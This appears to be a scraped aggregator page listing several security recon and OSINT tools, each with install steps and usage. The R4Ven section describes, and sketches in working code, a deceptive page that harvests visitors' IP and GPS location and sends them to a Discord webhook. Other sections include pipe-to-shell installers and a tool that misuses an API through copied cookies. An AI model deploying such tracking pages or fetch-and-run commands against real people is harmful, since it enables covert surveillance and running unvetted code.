    • HTTP/HTTPS detection is not ideal
    • Need option to adjust CSV newline delimiter
    • Need options to adjust where long strings / many lines are truncated
    • Try to figure out why we marked requests v2.x as required ;)
    • Options for very-verbose / quiet
    • Stagger thread launch when we're using sleep / jitter
    • Search for meta-refresh in 200 responses
    • Content-Location header for 201s ?
    • Improve thread name generation so we have the right number of unique names
    • Sanity check on IPv6 netmasks to prevent scans that outlive the sun?
    • TBD?

    Related Links

    Disclaimers

    • Copyright (C) 2023 RST
    • This software is distributed on an "AS IS" basis, without express or implied warranties of any kind
    • This software is intended for research and/or authorized testing; it is your responsibility to ensure you are authorized to use this software in any way
    • By using this software you acknowledge that you are responsible for your actions and assume all liability for any direct, indirect, or other damages


    Xurlfind3R - A CLI Utility To Find A Domain's Known URLs From Curated Passive Online Sources

    By: Zion3R


    xurlfind3r is a command-line interface (CLI) utility to find a domain's known URLs from curated passive online sources.


    Features

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xurlfind3r-<version>-linux-amd64.tar.gz

    TIP: The download and extract steps above can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

    ...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, make sure Go is installed on your system; you can install it by following the official instructions for your operating system. The steps below assume Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

    go build ... the development version

    • Clone the repository

       git clone https://github.com/hueristiq/xurlfind3r.git 
    • Build the utility

       cd xurlfind3r/cmd/xurlfind3r && \
      go build .
    • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xurlfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xurlfind3r will work right after installation. However, BeVigil, GitHub and Intelligence X require API keys to work; URLScan supports an API key but does not require one. API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - in YAML format. Multiple API keys can be specified for each of these sources, from which one will be used.

    Example config.yaml:

    version: 0.2.0
    sources:
        - bevigil
        - commoncrawl
        - github
        - intelx
        - otx
        - urlscan
        - wayback
    keys:
        bevigil:
            - awA5nvpKU3N8ygkZ
        github:
            - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
            - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
        intelx:
            - 2.intelx.io:00000000-0000-0000-0000-000000000000
        urlscan:
            - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display the help message for xurlfind3r, use the -h flag:

    xurlfind3r -h

    help message:

                     _  __ _           _ _____
    __  ___   _ _ __| |/ _(_)_ __   __| |___ / _ __
    \ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
     >  <| |_| | | | |  _| | | | | (_| |___) | |
    /_/\_\\__,_|_|  |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

    USAGE:
    xurlfind3r [OPTIONS]

    TARGET:
    -d, --domain string (sub)domain to match URLs

    SCOPE:
    --include-subdomains bool match subdomain's URLs

    SOURCES:
    -s, --sources bool list sources
    -u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
    --skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
    --skip-wayback-source bool with wayback, skip parsing source code snapshots

    FILTER & MATCH:
    -f, --filter string regex to filter URLs
    -m, --match string regex to match URLs

    OUTPUT:
    --no-color bool no color mode
    -o, --output string output URLs file path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

    Examples

    Basic

    xurlfind3r -d hackerone.com --include-subdomains

    Filter Regex

    # filter images
    xurlfind3r -d hackerone.com --include-subdomains -f '^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$'

    Match Regex

    # match js URLs
    xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'
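
    If you prefer to post-process saved output yourself, the same kind of matching is a few lines of ordinary Python (a standalone sketch, independent of xurlfind3r; urls.txt is a hypothetical file written with -o):

    import re

    # Same idea as -m above: keep only URLs that look like JavaScript files
    match_js = re.compile(r'^https?://[^/]*?/.*\.js(\?[^\s]*)?$')

    with open('urls.txt') as fh:
        for url in (line.strip() for line in fh):
            if match_js.match(url):
                print(url)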

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

    By: Zion3R


    A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

    The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

    Artemis is experimental software, under active development - use at your own risk.

    Features

    For an up-to-date list of features, please refer to the documentation.

    Development

    Tests

    To run the tests, use:

    ./scripts/test

    Code formatting

    Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

    To run it locally, use:

    pre-commit run --all-files

    To setup pre-commit so that it runs before each commit, use:

    pre-commit install

    Building the docs

    To build the documentation, use:

    cd docs
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    make html

    How do I write my own module?

    Please refer to the documentation.
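
    Artemis modules are Karton services under the hood, so the general shape of a module is a Karton consumer. As a rough orientation only (a generic karton-core skeleton with made-up identity, filter, and payload names; not Artemis's actual base class or task schema - see the documentation for those):

    from karton.core import Karton, Task

    class ExampleModule(Karton):
        """Hypothetical consumer: receives tasks and emits follow-up tasks."""
        identity = "example-module"            # queue name (made up)
        filters = [{"type": "example-input"}]  # task headers to consume (made up)

        def process(self, task: Task) -> None:
            host = task.get_payload("host")
            self.log.info("processing %s", host)
            # ... do the module's work here, then emit a result task:
            self.send_task(Task({"type": "example-output"}, payload={"host": host}))

    if __name__ == "__main__":
        ExampleModule().loop()  # blocking consume loop; config comes from karton.ini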

    Contributing

    Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

    However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



    Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

    How it works • Installation • Usage • MODES • For Developers • Credits

    Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

    SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

    In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

    SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

    [Thanks ChatGPT for the Description]


    How it Works?

    This tool mainly performs 3 tasks:

    1. Effective Subdomain Enumeration from Various Tools
    2. Get URLs with open HTTP and HTTPS services.
    3. Run Nuclei and other scans on the previous output. Basically, this is an automation script for your initial recon in bug bounty (see the pipeline sketch below).
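
    Conceptually, those three tasks chain into subdomains -> live URLs -> nuclei. A rough pipeline sketch (plain Python subprocess calls, assuming subfinder, httpx and nuclei are on PATH; this illustrates the flow, not scriptkiddi3's actual shell script):

    import subprocess

    domain = "target.com"

    # 1. Subdomain enumeration (subfinder is one of several tools the script chains)
    subs = subprocess.run(["subfinder", "-d", domain, "-silent"],
                          capture_output=True, text=True).stdout

    # 2. Probe which hosts answer over HTTP/HTTPS
    live = subprocess.run(["httpx", "-silent"], input=subs,
                          capture_output=True, text=True).stdout

    # 3. Run nuclei templates against the live URLs
    subprocess.run(["nuclei"], input=live, text=True)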

    Install SCRIPTKIDDI3

    SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirements:

    git clone https://github.com/thecyberneh/scriptkiddi3.git
    cd scriptkiddi3
    bash installer.sh

    Usage

    scriptkiddi3 -h

    This will display help for the tool. Here are all the switches it supports.

    [ABOUT:]
    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
    A recon and initial vulnerability detection tool built using shell script and open source tools.


    [Usage:]
    scriptkiddi3 [MODE] [FLAGS]
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    [MODES:]
    ['-m'/'--mode']
    Available Options for MODE:
    SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    URL | url Run scriptkiddi3 in URL ENUMERATION mode
    EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


    Features of EXPLOIT mode: subdomain enumeration, URL Enumeration,
    Vulnerability Detection with Nuclei,
    and Scan for SUBDOMAIN TAKEOVER

    [FLAGS:]
    [TARGET:] -d, --domain target domain to scan

    [CONFIG:] -c, --config path of your configuration file for subfinder

    [HELP:] -h, --help to get help menu

    [UPDATE:] -u, --update to update tool

    [Examples:]
    Run scriptkiddi3 in full Exploitation mode
    scriptkiddi3 -m EXP -d target.com


    Use your own CONFIG file for subfinder
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com


    Run scriptkiddi3 in URL ENUMERATION mode
    scriptkiddi3 -m URL -d target.com

    MODES

    1. FULL EXPLOITATION MODE

    Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

      scriptkiddi3 -m EXP -d target.com

    FULL EXPLOITATION MODE contains the following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • Effective URL Enumeration ( HTTP and HTTPs service )
    • Run Vulnerability Detection with Nuclei
    • Subdomain Takeover Test on previous results

    2. SUBDOMAIN ENUMERATION MODE

    Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

      scriptkiddi3 -m SUB -d target.com

    SUBDOMAIN ENUMERATION MODE contains the following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • You can use this mode if you only want to get subdomains; in other words, it automates subdomain enumeration across different tools

    3. URL ENUMERATION MODE

    Run scriptkiddi3 in URL ENUMERATION MODE

      scriptkiddi3 -m URL -d target.com

    URL ENUMERATION MODE contains the following functions

    • Same features as SUBDOMAIN ENUMERATION MODE, but also identifies HTTP or HTTPS services

    Using your own CONFIG File for subfinder

      scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

    You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.

    Updating the tool to the latest version: run the following command

      scriptkiddi3 -u

    An Example of config.yaml

    binaryedge:
        - 0bf8919b-aab9-42e4-9574-d3b639324597
        - ac244e2f-b635-4581-878a-33f4e79a2c13
    censys:
        - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
    certspotter: []
    passivetotal:
        - sample-email@user.com:sample_password
    securitytrails: []
    shodan:
        - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    github:
        - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
        - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
    zoomeye:
        - zoomeye_username:zoomeye_password

    For Developers

    If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

    If you have any other queries, you can always contact me on Twitter (@thecyberneh).

    Credits

    I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



    DataSurgeon - Quickly Extracts IPs, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers And More From Text


    DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more! (A toy regex sketch of this style of extraction follows the feature list below.)

    • Supports Windows, Linux and MacOS

    Extraction Features

    • Emails
    • Files
    • Phone numbers
    • Credit Cards
    • Google API Private Key IDs
    • Social Security Numbers
    • AWS Keys
    • Bitcoin wallets
    • URLs
    • IPv4 and IPv6 Addresses
    • MAC Addresses
    • SRV DNS Records
    • Extract Hashes
      • MD4 & MD5
      • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
      • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
      • MySQL 323, MySQL 41
      • NTLM
      • bcrypt
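
    For intuition, extraction of this kind boils down to running a set of patterns over every line. A toy sketch in Python (deliberately simplified regexes; not DataSurgeon's Rust implementation, and far less complete):

    import re

    PATTERNS = {
        "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
        "ipv4":  re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
        "md5":   re.compile(r"\b[a-fA-F0-9]{32}\b"),
    }

    def extract(line):
        for name, pattern in PATTERNS.items():
            for match in pattern.findall(line):
                yield name, match

    for kind, value in extract("admin@example.com logged in from 10.0.0.5"):
        print(f"{kind}: {value}")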

    Want more?

    Please read the contributing guidelines here

    Quick Install

    Install Rust and Git

    Linux

    wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

    Windows

    Enter the line below in an elevated PowerShell window.

    IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

    Relaunch your terminal and you will be able to use ds from the command line.

    Mac

    curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

    Command Line Arguments



    Video Guide

    Examples

    Extracting Files From a Remote Website

    Here I use wget to make a request to stackoverflow, then forward the body text to ds. The -F option lists all files found. --clean removes any extra text that might have been returned (such as extra HTML). The result is then piped to uniq, which removes duplicate entries.

     wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


    Extracting Mac Addresses From an Output File

    Here I am pulling all MAC addresses found in autodeauth's log file using the -m query. The --hide option hides the identifier string in front of the results; in this case, 'mac_address: ' is hidden from the output. The -T option checks the same line multiple times for matches; normally, once a match is found, the tool moves on to the next line rather than checking it again.

    $ ./ds -m -T --hide -f /var/log/autodeauth/log     
    2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
    2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

    Reading all files in a directory

    The line below will read all files in the current directory recursively. The -D option displays the filename (-f is required for the filename to display) and -e is used to search for emails.

    $ find . -type f -exec ds -f {} -CDe \;


    Speed Tests

    When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. It's also slightly faster to use cat to pipe the data to ds.

    Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was run 3 times and the average time was recorded.

    Computer Specs

    Processor: Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 MHz, 6 Core(s), 12 Logical Processor(s)
    RAM: 12.0 GB (11.9 GB usable)

    Searching all data types

    Command                               Speed
    cat test.txt | ds -t                  00h:02m:04s
    ds -t -f test.txt                     00h:02m:05s
    cat test.txt | ds -t -o output.txt    00h:02m:06s

    Using specific queries

    Command                       Speed          Query Count
    cat test.txt | ds -t -6       00h:00m:12s    1
    cat test.txt | ds -t -i -m    00h:00m:22s    2
    cat test.txt | ds -tF6c       00h:00m:32s    3

    Project Goals

    • JSON and CSV output
    • Untar/unzip and a directory searching mode
    • Base64 Detection and decoding


    R4Ven - Track Ip And GPS Location

    Track User's Smartphone/PC IP And GPS Location.

    The tool hosts a fake website which uses an iframe to display a legit website and, if the target allows it, fetches the GPS location (latitude and longitude) of the target along with the IP address and device information.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    Using this tool, you can find out what information a malicious website can gather about you and your devices and why you shouldn't click on random links or grant permissions like Location to them.


    On link click

    + It will automatically fetch the IP address and device information.
    ! If location permission is allowed, it will fetch the exact location of the target.
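
    As a rough sketch of that mechanism (a toy Flask page combining an iframe, the browser geolocation API, and a Discord webhook; not r4ven's actual code, and both URLs are placeholders):

    from flask import Flask, request
    import requests

    WEBHOOK_URL = "https://discord.com/api/webhooks/..."  # placeholder

    app = Flask(__name__)

    PAGE = """
    <iframe src="https://example.com" style="width:100%;height:100vh;border:0"></iframe>
    <script>
    // Ask the browser for GPS coordinates; this only works if the visitor allows it
    navigator.geolocation.getCurrentPosition(function (p) {
      fetch("/loc", {method: "POST",
                     headers: {"Content-Type": "application/json"},
                     body: JSON.stringify({lat: p.coords.latitude,
                                           lon: p.coords.longitude})});
    });
    </script>
    """

    @app.route("/")
    def index():
        return PAGE

    @app.route("/loc", methods=["POST"])
    def loc():
        data = request.get_json()
        # Discord webhooks accept a JSON body with a "content" field
        requests.post(WEBHOOK_URL, json={
            "content": f"IP: {request.remote_addr} GPS: {data['lat']},{data['lon']}"})
        return "", 204

    if __name__ == "__main__":
        app.run(port=8000)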

    Limitation

    - It will not work on laptops or phones that have broken GPS,
    # browsers that block JavaScript,
    # or if the user is mocking the GPS location.

    IP location vs GPS location

    - Geographic location based on IP address is NOT accurate;
    # it does not provide the location of the target.
    # Instead, it provides the approximate location of the ISP (Internet Service Provider).
    + GPS fetches an almost exact location because it uses longitude and latitude coordinates.
    @@ Once location permission is granted @@
    # accurate location information is received, to within 20 to 30 meters of the user's location
    # (it's almost the exact location)

    Installation

    git clone https://github.com/spyboy-productions/r4ven.git
    cd r4ven
    pip3 install -r requirements.txt
    python3 r4ven.py

    Enter your Discord webhook URL (set up a channel in your Discord server with a webhook integration):

    https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

    If you don't have a Discord account and server, make one; it's free.

    https://discord.com/

    
    Track info data will be sent to your discord webhook channel.
    • Why a Discord webhook? Conveniently, you will receive a notification when someone clicks on the link.

    To change the website template

    • Open the file index.html and, on line 12, replace the src in the iframe. (Note: not every website supports being embedded in an iframe.)


    To port forward, install ngrok or use SSH

    • For ngrok port forwarding type: ngrok http 8000
    • For SSH port forwarding type: ssh -R 80:localhost:8000 ssh.localhost.run

    Snapshots



    DomainDouche - OSINT Tool to Abuse SecurityTrails Domain Suggestion API To Find Potentially Related Domains By Keyword And Brute Force


    Abusing SecurityTrails domain suggestion API to find potentially related domains by keyword and brute force.

    Use it while it still works


    (Also, hmu on Mastodon: @n0kovo@infosec.exchange)


    Usage:

    usage: domaindouche.py [-h] [-n N] -c COOKIE -a USER_AGENT [-w NUM] [-o OUTFILE] keyword

    Abuses SecurityTrails API to find related domains by keyword.
    Go to https://securitytrails.com/dns-trails, solve any CAPTCHA you might encounter,
    copy the raw value of your Cookie and User-Agent headers and use them with the -c and -a arguments.

    positional arguments:
    keyword keyword to append brute force string to

    options:
    -h, --help show this help message and exit
    -n N, --num N number of characters to brute force (default: 2)
    -c COOKIE, --cookie COOKIE
    raw cookie string
    -a USER_AGENT, --useragent USER_AGENT
    user-agent string (must match the browser where the cookies are from)
    -w NUM, --workers NUM
    number of workers (default: 5)
    -o OUTFILE, --output OUTFILE
    output file path
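
    The -n flag drives a simple expansion: every combination of N extra characters is appended to the keyword, and each candidate is tried against the suggestion endpoint by a pool of workers. A sketch of just that generation/worker logic (the SecurityTrails request itself is stubbed out as a hypothetical fetch_suggestions(), and the alphabet is an assumption):

    import itertools
    import string
    from concurrent.futures import ThreadPoolExecutor

    def candidates(keyword, n):
        """Yield keyword plus every n-character suffix, e.g. 'acme' -> 'acmeaa', ..."""
        alphabet = string.ascii_lowercase + string.digits  # assumed charset
        for suffix in itertools.product(alphabet, repeat=n):
            yield keyword + "".join(suffix)

    def fetch_suggestions(term):
        """Hypothetical stand-in for the SecurityTrails suggestion request;
        the real tool sends the Cookie and User-Agent values from -c and -a."""
        return []

    with ThreadPoolExecutor(max_workers=5) as pool:  # mirrors -w (default: 5)
        for found in pool.map(fetch_suggestions, candidates("acme", 2)):
            for domain in found:
                print(domain)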

